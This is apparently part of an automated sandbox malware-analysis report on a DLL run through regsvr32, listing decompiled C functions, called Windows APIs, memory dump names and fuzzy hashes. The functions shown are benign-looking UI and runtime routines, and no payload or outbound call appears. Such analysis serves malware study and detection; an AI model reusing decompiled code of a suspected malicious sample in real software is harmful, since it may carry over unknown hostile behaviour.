                                                                                                                							_t88 =  *((intOrPtr*)(_t66 + 0x20));
                                                                                                                						} else {
                                                                                                                							_t88 = 0;
                                                                                                                						}
                                                                                                                						_t68 = E10013FEA(_t75, _t81, _t90, GetCapture());
                                                                                                                						if(_t68 != _t89) {
                                                                                                                							if(_t68 != 0) {
                                                                                                                								_t83 =  *((intOrPtr*)(_t68 + 0x20));
                                                                                                                							} else {
                                                                                                                								_t83 = 0;
                                                                                                                							}
                                                                                                                							if(_t83 != _t88 && E10015912(_t75, _t68, _t88) == _t75) {
                                                                                                                								_v8 = _v8 | 0xffffffff;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x10042de9
                                                                                                                0x10042dee
                                                                                                                0x10042df0
                                                                                                                0x10042df0
                                                                                                                0x10042df5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10042df5
                                                                                                                0x10042dd8
                                                                                                                0x10042d3c
                                                                                                                0x10042d41
                                                                                                                0x10042d43
                                                                                                                0x10042d4c
                                                                                                                0x10042d62
                                                                                                                0x10042d62
                                                                                                                0x00000000
                                                                                                                0x10042d4e
                                                                                                                0x10042d4e
                                                                                                                0x10042d50
                                                                                                                0x10042d52
                                                                                                                0x10042d52
                                                                                                                0x10042d57
                                                                                                                0x10042d60
                                                                                                                0x10042d66
                                                                                                                0x10042d66
                                                                                                                0x10042d6b
                                                                                                                0x10042d71
                                                                                                                0x10042d6d
                                                                                                                0x10042d6d
                                                                                                                0x10042d6d
                                                                                                                0x10042d7b
                                                                                                                0x10042d82
                                                                                                                0x10042d86
                                                                                                                0x10042d8c
                                                                                                                0x10042d88
                                                                                                                0x10042d88
                                                                                                                0x10042d88
                                                                                                                0x10042d91
                                                                                                                0x10042d9e
                                                                                                                0x10042d9e
                                                                                                                0x10042d91
                                                                                                                0x00000000
                                                                                                                0x10042d82
                                                                                                                0x00000000
                                                                                                                0x10042d60

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(00000001), ref: 10042CF2
                                                                                                                • GetCursorPos.USER32(?), ref: 10042D11
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10042D1E
                                                                                                                • GetCapture.USER32 ref: 10042D74
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • ClientToScreen.USER32(?,?), ref: 10042DBB
                                                                                                                • WindowFromPoint.USER32 ref: 10042DC7
                                                                                                                • IsChild.USER32(?,00000000), ref: 10042DDC
                                                                                                                • KillTimer.USER32 ref: 10042E19
                                                                                                                • KillTimer.USER32 ref: 10042E35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientKillScreenTimer$CaptureChildCursorException@8FromH_prolog3PointStateThrowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3327746620-0
                                                                                                                • Opcode ID: e02e66b9ae3eb0d9d37a27e792f25bf25985a6027c7ac9bccd68d12e8444e449
                                                                                                                • Instruction ID: cea651eaefb6eae771d5d7c726461fbeb3c05d9cf4bcdf2ee3770a7301017dbb
                                                                                                                • Opcode Fuzzy Hash: e02e66b9ae3eb0d9d37a27e792f25bf25985a6027c7ac9bccd68d12e8444e449
                                                                                                                • Instruction Fuzzy Hash: 8E41BE31B00216EFDB20DB65CD88AAE7BF5FF44360B6102B8E462D72A1DB31DE419B44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10020828(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t36;
                                                                                                                				void* _t39;
                                                                                                                				long _t41;
                                                                                                                				void* _t42;
                                                                                                                				long _t47;
                                                                                                                				void* _t53;
                                                                                                                				signed int _t55;
                                                                                                                				long* _t62;
                                                                                                                				struct _CRITICAL_SECTION* _t64;
                                                                                                                				void* _t65;
                                                                                                                				void* _t66;
                                                                                                                
                                                                                                                				_push(0x10);
                                                                                                                				E10047680(0x1008f521, __ebx, __edi, __esi);
                                                                                                                				_t62 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                                                                                				_t64 = __ecx + 0x1c;
                                                                                                                				 *(_t66 - 0x14) = _t64;
                                                                                                                				EnterCriticalSection(_t64);
                                                                                                                				_t36 =  *(_t66 + 8);
                                                                                                                				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                                                                                					_push(_t64);
                                                                                                                				} else {
                                                                                                                					_t65 = TlsGetValue( *_t62);
                                                                                                                					if(_t65 == 0) {
                                                                                                                						 *(_t66 - 4) = 0;
                                                                                                                						_t39 = E10020454(0x10);
                                                                                                                						__eflags = _t39;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t65 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							 *_t39 = 0x1009d654;
                                                                                                                							_t65 = _t39;
                                                                                                                						}
                                                                                                                						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                                                                						_t51 =  &(_t62[5]);
                                                                                                                						 *(_t65 + 8) = 0;
                                                                                                                						 *(_t65 + 0xc) = 0;
                                                                                                                						E100205D1( &(_t62[5]), _t65);
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						_t55 =  *(_t66 + 8);
                                                                                                                						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                                                                                							L5:
                                                                                                                							_t75 =  *(_t65 + 0xc);
                                                                                                                							if( *(_t65 + 0xc) != 0) {
                                                                                                                								_t41 = L10001311(_t51, __eflags, _t62[3], 4);
                                                                                                                								_t53 = 2;
                                                                                                                								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                                                                                							} else {
                                                                                                                								_t47 = L10001311(_t51, _t75, _t62[3], 4);
                                                                                                                								_pop(_t53);
                                                                                                                								_t42 = LocalAlloc(0, _t47);
                                                                                                                							}
                                                                                                                							_t76 = _t42;
                                                                                                                							if(_t42 == 0) {
                                                                                                                								LeaveCriticalSection( *(_t66 - 0x14));
                                                                                                                								_t42 = E1000A035(0, _t53, _t62, _t65, _t76);
                                                                                                                							}
                                                                                                                							 *(_t65 + 0xc) = _t42;
                                                                                                                							E10049170(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                                                                                							 *(_t65 + 8) = _t62[3];
                                                                                                                							TlsSetValue( *_t62, _t65);
                                                                                                                							_t55 =  *(_t66 + 8);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t36 =  *(_t65 + 0xc);
                                                                                                                					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                                                                                						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                                                                                					}
                                                                                                                					_push( *(_t66 - 0x14));
                                                                                                                				}
                                                                                                                				LeaveCriticalSection();
                                                                                                                				return E10047725(_t36);
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002082F
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000010,10020AE1,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 10020840
                                                                                                                • TlsGetValue.KERNEL32 ref: 1002085E
                                                                                                                • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10020892
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 100208FE
                                                                                                                • _memset.LIBCMT ref: 1002091D
                                                                                                                • TlsSetValue.KERNEL32(?,00000000,00000058,10006BB6), ref: 1002092E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 1002094F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1891723912-0
                                                                                                                • Opcode ID: faa515bd76de5715681dbbe460871e214a9cfb5e8ea6330566e2be09664c3bf2
                                                                                                                • Instruction ID: 2a10743f259bda41ed7af136b0d3390e832e65cc4432432f01a26c55eb007b07
                                                                                                                • Opcode Fuzzy Hash: faa515bd76de5715681dbbe460871e214a9cfb5e8ea6330566e2be09664c3bf2
                                                                                                                • Instruction Fuzzy Hash: CC319E74400706EFEB10DF60DC8599AB7B6FF00360B61C66AF95A97562CB70AD90CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1002942E(void* __esi, char* _a4, int _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				short _v528;
                                                                                                                				short _v1048;
                                                                                                                				short _v1568;
                                                                                                                				int _v1572;
                                                                                                                				char* _v1576;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t20;
                                                                                                                				int _t23;
                                                                                                                				void* _t26;
                                                                                                                				char* _t35;
                                                                                                                				int _t37;
                                                                                                                				void* _t42;
                                                                                                                				char* _t43;
                                                                                                                				void* _t47;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_t44 = __esi;
                                                                                                                				_t20 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t20 ^ _t49;
                                                                                                                				_t37 = _a8;
                                                                                                                				_t43 = _a4;
                                                                                                                				_v1576 = _t37;
                                                                                                                				if(lstrcmpiA(_t43, _t37) == 0) {
                                                                                                                					_t23 = GetSystemMetrics(0x2a);
                                                                                                                					if(_t23 != 0) {
                                                                                                                						_push(__esi);
                                                                                                                						_v1572 = lstrlenA(_t43);
                                                                                                                						if(_v1572 != lstrlenA(_t37)) {
                                                                                                                							L13:
                                                                                                                							_t26 = 0;
                                                                                                                						} else {
                                                                                                                							_t37 = GetThreadLocale();
                                                                                                                							GetStringTypeA(_t37, 1, _t43, 0xffffffff,  &_v1568);
                                                                                                                							GetStringTypeA(_t37, 4, _t43, 0xffffffff,  &_v528);
                                                                                                                							GetStringTypeA(_t37, 1, _v1576, 0xffffffff,  &_v1048);
                                                                                                                							_t35 = _t43;
                                                                                                                							if( *_t43 == 0) {
                                                                                                                								L10:
                                                                                                                								_t26 = 1;
                                                                                                                							} else {
                                                                                                                								_t47 = 0;
                                                                                                                								while(( *(_t49 + _t47 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x61c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x414))) {
                                                                                                                									_t47 = _t47 + 2;
                                                                                                                									if( *_t35 != 0) {
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										goto L10;
                                                                                                                									}
                                                                                                                									goto L11;
                                                                                                                								}
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L11:
                                                                                                                						_pop(_t44);
                                                                                                                					} else {
                                                                                                                						_t26 = _t23 + 1;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t26 = 0;
                                                                                                                				}
                                                                                                                				return E1004763E(_t26, _t37, _v8 ^ _t49, _t42, _t43, _t44);
                                                                                                                			}





















                                                                                                                APIs
                                                                                                                • lstrcmpiA.KERNEL32(?,00000000,00000000), ref: 10029451
                                                                                                                • GetSystemMetrics.USER32 ref: 10029464
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystemlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 2335526769-0
                                                                                                                • Opcode ID: c28886dce3c898e687dc4c2d76ad89fb83670343aa9dee684a9b6afb0d406b45
                                                                                                                • Instruction ID: ec0d1c6a6b6d5934df8a485b178ddfb646fdcce51f2dd72e4357131ab1d54fac
                                                                                                                • Opcode Fuzzy Hash: c28886dce3c898e687dc4c2d76ad89fb83670343aa9dee684a9b6afb0d406b45
                                                                                                                • Instruction Fuzzy Hash: 29210871A00269AAEB11DF749C84FDB7BEDEB4A7A0F6002A1FD16D21C1DA749D41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 61%
                                                                                                                			E100253FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				int _t33;
                                                                                                                				void* _t44;
                                                                                                                				int _t45;
                                                                                                                				intOrPtr _t53;
                                                                                                                				void* _t60;
                                                                                                                				struct HWND__* _t62;
                                                                                                                				void* _t65;
                                                                                                                				void* _t66;
                                                                                                                
                                                                                                                				_t60 = __edx;
                                                                                                                				_push(8);
                                                                                                                				E1004764D(0x1008f872, __ebx, __edi, __esi);
                                                                                                                				_t62 =  *(_t66 + 8);
                                                                                                                				E1001F0AF(_t62,  *((intOrPtr*)(_t66 + 0xc)));
                                                                                                                				E100176B3( *((intOrPtr*)(_t62 + 4)),  *((intOrPtr*)(_t66 + 0xc)), _t66 + 8);
                                                                                                                				if(_t62->i == 0) {
                                                                                                                					_t33 = GetThreadLocale();
                                                                                                                					__imp__#232( *(_t66 + 0x10), _t33, 0, _t66 - 0x10);
                                                                                                                					__eflags = _t33;
                                                                                                                					if(__eflags >= 0) {
                                                                                                                						E1000B053(0, _t66 - 0x14, _t62, __esi, __eflags);
                                                                                                                						 *((intOrPtr*)(_t66 - 4)) = 1;
                                                                                                                						__imp__#6( *((intOrPtr*)(_t66 - 0x10)),  *((intOrPtr*)(_t66 - 0x10)));
                                                                                                                						E100219F5(_t66 - 0x14, _t60,  *(_t66 + 8),  *((intOrPtr*)(_t66 - 0x14)));
                                                                                                                						_t53 =  *((intOrPtr*)(_t66 - 0x14));
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t64 = GetWindowTextLengthA( *(_t66 + 8));
                                                                                                                					L1000140B(_t66 + 0xc, E100184C0());
                                                                                                                					_t8 = _t64 + 1; // 0x1
                                                                                                                					 *((intOrPtr*)(_t66 - 4)) = 0;
                                                                                                                					GetWindowTextA( *(_t66 + 8), E100103E6(_t66 + 0xc, _t37), _t8);
                                                                                                                					E1000FED3(_t66 + 0xc, 0xffffffff);
                                                                                                                					_t44 = E100147D9(0, _t66 + 0xc, _t60, _t62, _t37);
                                                                                                                					_t65 = _t44;
                                                                                                                					_t45 = GetThreadLocale();
                                                                                                                					__imp__#197(_t65, _t45, 0,  *(_t66 + 0x10));
                                                                                                                					 *(_t66 + 0x10) = _t45;
                                                                                                                					__imp__#6(_t65);
                                                                                                                					_t69 =  *(_t66 + 0x10);
                                                                                                                					if( *(_t66 + 0x10) < 0) {
                                                                                                                						_push(0xffffffff);
                                                                                                                						_push(0);
                                                                                                                						_push(0xf111);
                                                                                                                						E1001B561(0, _t60, _t62, _t65, _t69);
                                                                                                                						E1001ECE0(_t62);
                                                                                                                					}
                                                                                                                					_t53 =  *((intOrPtr*)(_t66 + 0xc));
                                                                                                                					L6:
                                                                                                                					_t33 = L100013E3(_t53 + 0xfffffff0, _t60);
                                                                                                                				}
                                                                                                                				return E10047725(_t33);
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025406
                                                                                                                  • Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0
                                                                                                                • GetWindowTextLengthA.USER32 ref: 10025434
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000000), ref: 1002545E
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                • GetThreadLocale.KERNEL32(00000000,?,000000FF), ref: 1002547C
                                                                                                                • VarDecFromStr.OLEAUT32(00000000,00000000), ref: 10025484
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 1002548E
                                                                                                                  • Part of subcall function 1001B561: __EH_prolog3.LIBCMT ref: 1001B568
                                                                                                                  • Part of subcall function 1001ECE0: SetFocus.USER32 ref: 1001ED09
                                                                                                                  • Part of subcall function 1001ECE0: SendMessageA.USER32 ref: 1001ED21
                                                                                                                • GetThreadLocale.KERNEL32(00000000,?,?,?,?,00000008), ref: 100254B7
                                                                                                                • VarBstrFromDec.OLEAUT32(?,00000000), ref: 100254C1
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 100254E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromH_prolog3LocaleStringTextThreadWindow$BstrFocusItemLengthMessageSend_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2376774703-0
                                                                                                                • Opcode ID: 86baee08e6e8a0bae1c7f9a786f23086b386dd2aa20a3ea4805c4bcd496d968e
                                                                                                                • Instruction ID: 8efa296c8f4f5d99c1d74aff30f9075005738b09ad55c9108602e393422d39f0
                                                                                                                • Opcode Fuzzy Hash: 86baee08e6e8a0bae1c7f9a786f23086b386dd2aa20a3ea4805c4bcd496d968e
                                                                                                                • Instruction Fuzzy Hash: A831717950011AFFDF01EFA0CD858FE7B3AFF05355B508218F9269A1A2CB31AA51DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10001159(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                				void* _t57;
                                                                                                                				intOrPtr _t61;
                                                                                                                				intOrPtr* _t75;
                                                                                                                				short _t105;
                                                                                                                				unsigned int _t110;
                                                                                                                				void* _t126;
                                                                                                                				void* _t146;
                                                                                                                				void* _t148;
                                                                                                                				void* _t149;
                                                                                                                				void* _t157;
                                                                                                                
                                                                                                                				_t157 = __fp0;
                                                                                                                				_t143 = __edx;
                                                                                                                				_push(0x18);
                                                                                                                				E1004764D(0x1008da9e, __ebx, __edi, __esi);
                                                                                                                				_t148 = __ecx;
                                                                                                                				_t113 =  *((intOrPtr*)(_t149 + 0x10));
                                                                                                                				_t153 =  *((intOrPtr*)(_t149 + 0x10));
                                                                                                                				if( *((intOrPtr*)(_t149 + 0x10)) != 0) {
                                                                                                                					L10001127(__ebx, _t113, __edx, __edi, __ecx, _t153);
                                                                                                                				}
                                                                                                                				_t57 = E10001041(_t148 + 0x148);
                                                                                                                				_t145 = 0xff;
                                                                                                                				 *(_t149 - 0x1c) = 0xff - _t57;
                                                                                                                				 *((intOrPtr*)(_t149 - 0x18)) = 0xff - E10001041(_t148 + 0x250);
                                                                                                                				 *((intOrPtr*)(_t149 - 0x14)) = 0xff - E10001041(_t148 + 0x2d4);
                                                                                                                				_t105 = 0xf0 - E10001041(_t148 + 0x1cc);
                                                                                                                				_t61 =  *((intOrPtr*)(_t149 + 0x10));
                                                                                                                				_t154 =  *((intOrPtr*)(_t61 + 0x20)) -  *((intOrPtr*)(_t148 + 0x1ec));
                                                                                                                				if( *((intOrPtr*)(_t61 + 0x20)) !=  *((intOrPtr*)(_t148 + 0x1ec))) {
                                                                                                                					_t110 = 0 << 0x00000008 |  *(_t149 - 0x1c) & 0x000000ff;
                                                                                                                					ColorRGBToHLS(0 << 8, _t149 - 0x24, _t149 - 0x10, _t149 - 0x20);
                                                                                                                					__eflags = 0xf0;
                                                                                                                					_push(0xf0 - ( *(_t149 - 0x10) & 0x0000ffff));
                                                                                                                					_t126 = _t148 + 0x1cc;
                                                                                                                				} else {
                                                                                                                					ColorRGBToHLS(0 << 0x00000008 |  *(_t149 - 0x1c) & 0x000000ff, _t149 - 0x24, _t149 - 0x10, _t149 - 0x20);
                                                                                                                					 *(_t149 - 0x10) = _t105 & 0x0000ffff;
                                                                                                                					_t110 = ColorHLSToRGB( *(_t149 - 0x24), _t105,  *(_t149 - 0x20));
                                                                                                                					L1000100A(_t110, _t148 + 0x148, _t143, 0xff, _t149, _t154, 0xff - (_t110 & 0x000000ff));
                                                                                                                					L1000100A(_t110, _t148 + 0x250, _t143, 0xff, _t149, _t154, 0xff - (_t110 & 0x000000ff));
                                                                                                                					_t145 = 0xff - (_t110 >> 0x00000010 & 0x000000ff);
                                                                                                                					_push(0xff);
                                                                                                                					_t126 = _t148 + 0x2d4;
                                                                                                                				}
                                                                                                                				L1000100A(_t110, _t126, _t143, _t145, _t149, _t154);
                                                                                                                				_t146 = InvalidateRect;
                                                                                                                				 *(_t148 + 0xf0) =  *(_t149 - 0x10) & 0x0000ffff;
                                                                                                                				 *(_t148 + 0xec) = _t110;
                                                                                                                				InvalidateRect( *(_t148 + 0x9c), 0, 1);
                                                                                                                				_t155 =  *((intOrPtr*)(_t148 + 0x78));
                                                                                                                				if( *((intOrPtr*)(_t148 + 0x78)) != 0) {
                                                                                                                					L1000CFF6(_t148 + 0x74);
                                                                                                                				}
                                                                                                                				E10001091(_t148 + 0x74, _t110);
                                                                                                                				L1000140B(_t149 - 0x1c, E100184C0());
                                                                                                                				 *(_t149 - 4) =  *(_t149 - 4) & 0x00000000;
                                                                                                                				_push(0);
                                                                                                                				_push(_t110);
                                                                                                                				_push(_t149 - 0x18);
                                                                                                                				_t75 = L100012F3(_t110, _t146, _t148, _t155, _t157);
                                                                                                                				 *(_t149 - 4) = 1;
                                                                                                                				L1000106E(_t149 - 0x1c, " Similar to %s ",  *_t75);
                                                                                                                				 *(_t149 - 4) = 0;
                                                                                                                				L100013E3( *((intOrPtr*)(_t149 - 0x18)) + 0xfffffff0, _t143);
                                                                                                                				_t111 =  *(_t149 - 0x1c);
                                                                                                                				E10017880(_t148 + 0xf4,  *(_t149 - 0x1c));
                                                                                                                				InvalidateRect( *(_t148 + 0x114), 0, 1);
                                                                                                                				_push( *((intOrPtr*)(_t149 + 0x10)));
                                                                                                                				_push( *((intOrPtr*)(_t149 + 0xc)));
                                                                                                                				E1001468A( *(_t149 - 0x1c), _t148, _t146, _t149,  *((intOrPtr*)(_t149 + 8)));
                                                                                                                				return E10047725(L100013E3(_t111 - 0x10, _t143));
                                                                                                                			}













                                                                                                                0x10008a64

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10008891
                                                                                                                • ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 1000891D
                                                                                                                • ColorHLSToRGB.SHLWAPI(?,000000F0,?), ref: 10008930
                                                                                                                • ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 1000898F
                                                                                                                  • Part of subcall function 10017880: IsWindow.USER32(?), ref: 1001788F
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 100089CC
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 10008A45
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$InvalidateRect$H_prolog3Window
                                                                                                                • String ID: Similar to %s
